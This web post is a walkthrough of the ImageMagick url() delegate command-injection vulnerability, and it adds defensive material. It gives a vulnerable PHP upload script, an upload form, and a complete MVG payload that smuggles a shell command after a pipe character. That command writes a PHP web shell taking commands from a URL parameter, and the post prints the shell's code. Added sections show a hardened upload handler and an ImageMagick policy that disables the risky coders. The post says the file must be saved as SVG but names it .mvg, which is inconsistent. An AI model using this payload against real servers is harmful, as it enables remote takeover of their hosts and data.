Please don't use this information to attack someone else's application. Instead, use it to protect yourself from being compromised by this particular vulnerability.
This hack works on ImageMagick version 3.3.0 and below.
Below is a sample PHP script that accepts an uploaded file. Assume this script only accepts image files, including .mvg files. (I'm too lazy to add a check for file extensions; I'm sure you'll understand 😛)
imagick.php
<?php
if (isset($_FILES) && !empty($_FILES)) {
    $thumb = new Imagick();                          // ImageMagick wrapper from the imagick extension
    $thumb->readImage($_FILES['img']['tmp_name']);   // reads the upload as-is: the format is sniffed from the content, so an MVG body is honoured
    $thumb->writeImage('/tmp/output.jpg');           // re-encodes the result as JPEG
    $thumb->clear();
    $thumb->destroy();
}
This script simply processes your uploaded file using the imagick extension for PHP.
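For contrast, here is a hardened version of the same handler. This is an added example, not the script from the original post: it assumes the same form field name "img" and the same output path /tmp/output.jpg, and it decides what to do based on the bytes of the uploaded file rather than on its name, so renaming img.mvg to img.jpg does not get a text-format file past it. The `coder:path` prefix on readImage is ImageMagick's explicit-format syntax; it stops the library from guessing the format from the content.

```php
<?php
// Added example: a hardened version of the page's imagick.php, not the
// original script. It assumes the same form field name "img" as form.html
// and the same output path /tmp/output.jpg.

// Only these raster formats are handed to ImageMagick. The key is the MIME
// type derived from the file's magic bytes; the value is the explicit
// ImageMagick coder prefix used when reading, so no format sniffing happens.
const ALLOWED_RASTER = [
    'image/jpeg' => 'jpeg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Returns the coder prefix for $path if it is a genuine raster image of an
 * allowed type, or null if it must be rejected. The decision is based on file
 * content, never on the client-supplied filename or extension.
 */
function classify_upload(string $path): ?string
{
    // 1. MIME type from magic bytes, independent of the filename.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($path);
    if ($mime === false || !isset(ALLOWED_RASTER[$mime])) {
        return null;
    }

    // 2. getimagesize() must be able to parse a header and agree on the type.
    $info = @getimagesize($path);
    if ($info === false || ($info['mime'] ?? '') !== $mime) {
        return null;
    }

    // 3. Refuse anything whose first bytes look like MVG or SVG text, which is
    //    the carrier for the url() injection described in the post. Raster
    //    files never start this way, so legitimate uploads are unaffected.
    $head = file_get_contents($path, false, null, 0, 512);
    if ($head === false || preg_match('/push\s+graphic-context|<svg\b|<\?xml/i', $head)) {
        return null;
    }

    return ALLOWED_RASTER[$mime];
}

if (isset($_FILES['img']) && $_FILES['img']['error'] === UPLOAD_ERR_OK) {
    $tmp = $_FILES['img']['tmp_name'];

    // is_uploaded_file() guards against a path that did not come from this request.
    $coder = is_uploaded_file($tmp) ? classify_upload($tmp) : null;
    if ($coder === null) {
        http_response_code(400);
        exit('Rejected: only JPEG, PNG or GIF images are accepted.');
    }

    $thumb = new Imagick();
    // "png:/path" style prefix pins the coder ImageMagick uses instead of
    // letting it guess from the content, so an MVG body cannot be honoured.
    $thumb->readImage($coder . ':' . $tmp);
    $thumb->setImageFormat('jpeg');
    $thumb->writeImage('/tmp/output.jpg');
    $thumb->clear();
    $thumb->destroy();
}
```

The three checks are deliberately redundant: finfo and getimagesize can disagree on edge cases, and the text sniff catches a file that passes both because of a crafted header. If the application genuinely needs to accept SVG, it should be parsed with a dedicated sanitiser rather than handed to ImageMagick.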
Now, let's create a form that accepts a file and submits it to our PHP script.
form.html
<form action="imagick.php" enctype="multipart/form-data" method="post">
    <input name="img" type="file" />
    <input type="submit" />
</form>
All is set. Now all we need to do is upload the image file. But first, we need to create the image file itself.
NOTE: We need to save our file as SVG for our little trick to work.
img.mvg
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/image.jpg"|echo \<\?php exec\(\$\_GET\[\"cmd\"\]\,\$a\, \$b \)\; echo \"\<pre\>\"\; print\_r\(\$a\)\; > /path/to/your/shell.php")'
pop graphic-context
Now that we have all the files, all that is left to do is upload the img.mvg file using form.html and let imagick.php process it.
What happens during the upload? Eventually, imagick processes our img.mvg and, because the URL inside url() is handed to an external delegate command through the shell without filtering, everything after the `|` character on line 3 of our img.mvg file is executed as a shell command. That means it creates a file called shell.php at the path you specified, with content like this:
<?php exec($_GET["cmd"],$a, $b ); echo "<pre>"; print_r($a);
And there you go: you have created a PHP shell using the Imagick vulnerability.
PS: The path to your shell file needs to be accessible via URL so you can execute your PHP shell.
To protect yourself from this vulnerability, update your Imagick extension or use the GD library instead 😀
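Updating is the right fix, but there is also a configuration-level mitigation that works regardless of what the application does: ImageMagick's security policy can disable the coders that turn text input into delegate commands. The fragment below is an added example, not part of the original post. It assumes the policy file lives at ImageMagick's usual location (for example /etc/ImageMagick-6/policy.xml or /etc/ImageMagick/policy.xml, depending on the distribution) and is merged into the existing <policymap> element there.

```xml
<policymap>
  <!-- Disable the coders that let a text "image" reach a delegate command.
       Added example; merge these lines into the existing policy.xml. -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
</policymap>
```

With this in place, the img.mvg above is refused before the url() fill is ever evaluated, so the shell.php file is never written. You can confirm the policy is loaded with `convert -list policy`, which prints the active policymap; if the MVG and URL entries are missing from its output, the file is not being read from the path you edited.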